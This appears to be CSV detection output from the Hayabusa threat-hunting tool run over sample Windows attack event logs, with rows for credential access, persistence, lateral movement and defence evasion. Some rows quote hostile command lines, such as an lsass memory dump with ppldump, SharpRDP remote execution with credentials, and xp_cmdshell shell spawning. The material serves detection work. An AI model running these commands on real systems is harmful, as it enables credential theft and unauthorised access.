2019-09-06 22:49:35.433 +09:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: c:\Users\IEUser\Desktop\kekeo.exe | PID: 6908 | PGUID: 747F3D96-393E-5D72-0000-0010AD443200,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx
2019-09-06 22:49:39.823 +09:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: C:\Users\IEUser\Desktop\kekeo.exe | PID: 7808 | PGUID: 747F3D96-3944-5D72-0000-001019773200,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx
2019-09-06 23:58:44.918 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3128 | PGUID: 747F3D96-7424-5D72-0000-0010BEFBBC00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx
2019-09-09 04:14:54.471 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Guest RID Hijack | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F5\F: Binary Data | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | PID: 7680 | PGUID: 747F3D96-067D-5D75-0000-001007745500,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx
2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,ResDev,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx
2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,high,CredAccess | Exec,PowerShell Credential Prompt,,rules/sigma/powershell/powershell_script/posh_ps_prompt_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx
2019-09-09 22:35:09.315 +09:00,MSEDGEWIN10,4104,medium,Persis,Manipulation of User Computer or Group Security Principals Across AD,,rules/sigma/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx
2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3461203602-4096304019-2269080069-501 | Group: Administrators | LID: 0x27a10f,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx
2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-20 | Group: Administrators | LID: 0x27a10f,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx
2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\sqlsvc | Parent Cmd: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS | LID: 0x1d51e | PID: 5004 | PGUID: 747F3D96-DB7C-5DBE-0000-0010CF6B9502",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx
2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx
2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,info,,Logoff,User: ANONYMOUS LOGON | LID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx
2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7a3aff | PID: 4180 | PGUID: 747F3D96-2842-5E1E-0000-00100C417A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | LID: 0x7a3aff | PID: 1568 | PGUID: 747F3D96-2842-5E1E-0000-0010745E7A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7a3aff | PID: 676 | PGUID: 747F3D96-2843-5E1E-0000-0010B1687A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,OpenURL ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7beb57 | PID: 3412 | PGUID: 747F3D96-28B3-5E1E-0000-00101DF17B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,OpenURL ms-browser:// | LID: 0x7beb57 | PID: 1656 | PGUID: 747F3D96-28B3-5E1E-0000-001032047C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7beb57 | PID: 2964 | PGUID: 747F3D96-28B3-5E1E-0000-0010900A7C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /c start ms-browser:// | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7cef82 | PID: 4448 | PGUID: 747F3D96-2910-5E1E-0000-001053F57C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c start ms-browser:// | LID: 0x7cef82 | PID: 2416 | PGUID: 747F3D96-2911-5E1E-0000-0010D80A7D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7cef82 | PID: 1344 | PGUID: 747F3D96-2911-5E1E-0000-00109C137D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: explorer ms-browser:// | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7d58cd | PID: 3828 | PGUID: 747F3D96-292D-5E1E-0000-0010F5597D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x565a6 | PID: 6020 | PGUID: 747F3D96-292D-5E1E-0000-001025607D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx
2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password | Process: C:\ProgramData\USOShared\SharpRDP.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xd50da8 | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
2020-01-24 04:09:34.657 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
2020-01-24 04:09:34.657 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
2020-01-24 04:09:34.660 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"LM - suspicious RDP Client | Image: C:\Windows\SysWOW64\mstscax.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=359B2E4C537B00DD450D1E7B3465EE1BA094E8D6,MD5=654534BAC7465961F302C7A990DFDC8D,SHA256=D9827ABED81572C296BB6A63863515BA7B9EB1C8164A4E92A97E1FF0BD04AAB1,IMPHASH=1EA1D2F3BE5D1C352344C4CBF6A7614C",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx
2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Furutaka.exe dummy2.sys | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x31a17 | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=68B26C16080D71013123C6DEE7B1AABC3D2857D0,MD5=B1B981CD8B111783B80F3C4E10086912,SHA256=37805CC7AE226647753ACA1A32D7106D804556A98E1A21AC324E5B880B9A04DA,IMPHASH=114E27FBB0E975697F2F9988DE884FA7",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 17:28:12.876 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Process: c:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 17:28:12.981 +09:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\VBoxDrv.sys | Status: Valid | Hash: SHA1=7C1B25518DEE1E30B5A6EAA1EA8E4A3780C24D0C,MD5=EAEA9CCB40C82AF8F3867CD0F4DD5E9D,SHA256=CF3A7D4285D65BF8688215407BCE1B51D7C6B22497F09021F0FCE31CBEB78986,IMPHASH=B262E8D078EDE007EBD0AA71B9152863",rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 17:28:12.981 +09:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\VBoxDrv.sys | Signature: innotek GmbH,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 17:28:13.098 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 17:28:13.147 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Supicious image loaded - ntoskrnl | Image: C:\Windows\System32\ntoskrnl.exe | Process: C:\Users\Public\BYOV\TDL\Furutaka.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3768 | PGUID: 747F3D96-141C-5E41-0000-0010788B1E00 | Hash: SHA1=667AFD98C8BAA2CF95C9EE087CB36A0F6508A942,MD5=0EED97AD8D855B5EDF948A7866D5F874,SHA256=C36A8FAC48690632731D56747CBBDCE2453D3E5303A73896505D495F7678DFF0,IMPHASH=4D717BA02FC8AA76777B033C52AA4694",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx
2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: ppldump.exe -p lsass.exe -o a.png | Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x97734 | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Hash: SHA1=C8BBBB2554D7C1F29B8670A14BE4E52D7AF81A24,MD5=DD7D6D8101A6412ABFA7B55F10E1D31B,SHA256=70908F9BBC59198FEBE0D1CA0E34A9E79C68F5053A39A0BA0C6F6CEC9ED1A875,IMPHASH=0EFF65F1D3AC0A58787724FB03E2D1BC",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\Public\BYOV\ZAM64\ppldump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5016 | Src PGUID: 747F3D96-2B98-5E41-0000-00109C904700 | Tgt PID: 624 | Tgt PGUID: 747F3D96-A042-5E41-0000-0010E4560000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:25.164 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbgcore.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=E3FA87C983008D4D2A5D31708415F88548FC7702,MD5=88E88D8C1C663769BDD722000A7EB5A7,SHA256=C84BECA73EA45D3C53D9C42CD6A37CC0CC07FF57D9CFEE113CDF70F640572AEF,IMPHASH=9D75F08EA29885182B136CE4FF854114",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:25.193 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:25.193 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Suspicious ImageLoad - Possible Memdump | Image: C:\Windows\System32\dbghelp.dll | Process: C:\Windows\System32\lsass.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 624 | PGUID: 747F3D96-A042-5E41-0000-0010E4560000 | Hash: SHA1=8B5BC2EAA00C530DF0FF139635E428FA4C5D7AA8,MD5=B0A68C5BB8D5493F1AF967F0FDD80382,SHA256=2CF0972DC8A67D863AD1A6205B66C80865ACC11F7E3F67B4A76C162655EE0FEE,IMPHASH=AB902346D2BD8706EE70C87E00136BAC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-10 19:08:27.797 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\BYOV\ZAM64\ppldump.exe | PID: 5016 | PGUID: 747F3D96-2B98-5E41-0000-00109C904700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx
2020-02-11 20:05:37.148 +09:00,MSEDGEWIN10,6,medium,Evas,Driver Loaded_Unsigned,"Path: C:\Windows\System32\drivers\RwDrv.sys | Status: Valid | Hash: SHA1=66E95DAEE3D1244A029D7F3D91915F1F233D1916,MD5=60E84516C6EC6DFDAE7B422D1F7CAB06,SHA256=D969845EF6ACC8E5D3421A7CE7E244F419989710871313B04148F9B322751E5D,IMPHASH=955E7B12A8FA06444C68E54026C45DE1",rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx
2020-02-11 20:05:37.148 +09:00,MSEDGEWIN10,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\drivers\RwDrv.sys | Signature: ChongKim Chan,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_UEFI_Settings_rweverything_sysmon_6.evtx
2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx
2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,CredAccess,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx
